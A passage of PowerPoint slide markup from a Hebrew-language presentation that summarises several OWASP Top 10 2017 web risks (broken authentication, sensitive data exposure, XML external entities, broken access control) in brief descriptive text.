                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Freeform 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9D11D811-BC41-418D-90D1-CD609B0626DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="98630" y="1874768"/>
            <a:ext cx="5218177" cy="611796"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4">
              <a:alpha val="90000"/>
              <a:tint val="40000"/>
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent4">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36577" tIns="66441" rIns="66441" bIns="48154" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="91440" lvl="1" algn="r" defTabSz="444500" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="15000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>פונקציות ביישום המשויכות לאימות ולמנגנון ניהול שיחה מיושמות לרבות בצורה שגויה, ומאפשרות לתוקף לחבל בסיסמאות, מפתחות גישה (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) או מזהה שיחה (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>session tokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) או מאפשרות לנצל חולשות נוספות במימוש על-מנת לגנוב זהויות של משתמשים זמניים או קבועים.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Freeform 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{56513DEF-2444-40AD-AE64-66E7CC6256D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5301114" y="1817196"/>
            <a:ext cx="1413251" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="83052" tIns="60192" rIns="83052" bIns="60192" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="533400" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A2:2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> - הזדהות שבורה</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Freeform 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{5F0014DB-969D-4359-A7D1-99F0AAA09C12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="98630" y="2677749"/>
            <a:ext cx="5218177" cy="666102"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4">
              <a:alpha val="90000"/>
              <a:tint val="40000"/>
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent4">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36577" tIns="66441" rIns="66441" bIns="48154" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="91440" lvl="1" algn="r" defTabSz="444500" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="15000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>יישומי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> רבים וכן ממשקי פיתוח (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) אינם מגנים כראוי על מידע רגיש, כגון מידע פיננסי, רפואי ונתונים אישיים. תוקפים עשויים לגנוב או לשנות מידע רגיש זה אשר מוגן בצורה חלשה על-מנת לבצע הונאת כרטיסי אשראי, גניבת זהות, או פשעים אחרים. מידע רגיש עשוי להיפגע ללא הגנה נוספת כגון הצפנה בעת אחסון או בעת תעבורה, ודורש אמצעי הגנה מיוחדים כאשר המידע מועבר לדפדפן.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Freeform 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{BF109756-C917-4ECB-9826-AC54F0948B32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5301114" y="2620178"/>
            <a:ext cx="1413251" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="83052" tIns="60192" rIns="83052" bIns="60192" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="533400" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A3:2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> - חשיפת מידע רגיש</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{B2A0868A-364E-4487-8030-7C4BD69D47DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="98630" y="3536885"/>
            <a:ext cx="5218177" cy="531518"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4">
              <a:alpha val="90000"/>
              <a:tint val="40000"/>
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent4">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36577" tIns="66442" rIns="66441" bIns="48153" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="91440" lvl="1" algn="r" defTabSz="444500" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="15000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" kern="1200" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הרבה מאוד רכיבי עיבוד </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" kern="1200" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ישנים או כאלו שמוגדרים בצורה גרועה, מבצעים הערכה לישויות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" kern="1200" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> חיצוניות בתוך מסמכים. ישויות חיצוניות עשויות לחשוף מידע לגבי קבצים פנימיים באמצעות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>URI handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" kern="1200" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, שיתופי קבצים פנימיים, סריקת פורטים פנימיים, הרצת קוד עוין מרוחק ומתקפות מניעת שירות.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Freeform 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{3635AA73-30CD-4FEB-BBAF-A9AD20490C16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5301114" y="3425038"/>
            <a:ext cx="1413251" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="83052" tIns="60192" rIns="83052" bIns="60192" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="533400" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A4:2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> - ישויות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> חיצוניות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XXE)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Freeform 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{25F57B3B-227A-4B44-B219-FB6A81F17116}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="98630" y="4322705"/>
            <a:ext cx="5218177" cy="542148"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4">
              <a:alpha val="90000"/>
              <a:tint val="40000"/>
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent4">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36577" tIns="66442" rIns="66441" bIns="48153" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="91440" lvl="1" algn="r" defTabSz="444500" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="15000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הגבלות על מה ניתן למשתמשים מאומתים לבצע לרוב אינן נאכפות כראוי.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="91440" lvl="1" algn="r" defTabSz="444500" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="15000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תוקפים עשויים לנצל חולשות אלו על-מנת לגשת ליכולות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ו</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>או מידע </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>באופן בלתי מורשה, כגון גישה לחשבונות משתמש אחרים, צפייה בקבצים רגישים, עדכון מידע של משתמשים אחרים, שינוי הרשאות גישה ועוד.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Freeform 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{0F2374FD-7476-44F3-B906-9417B048A9A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5301114" y="4228019"/>
            <a:ext cx="1413251" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="83052" tIns="60192" rIns="83052" bIns="60192" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="533400" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
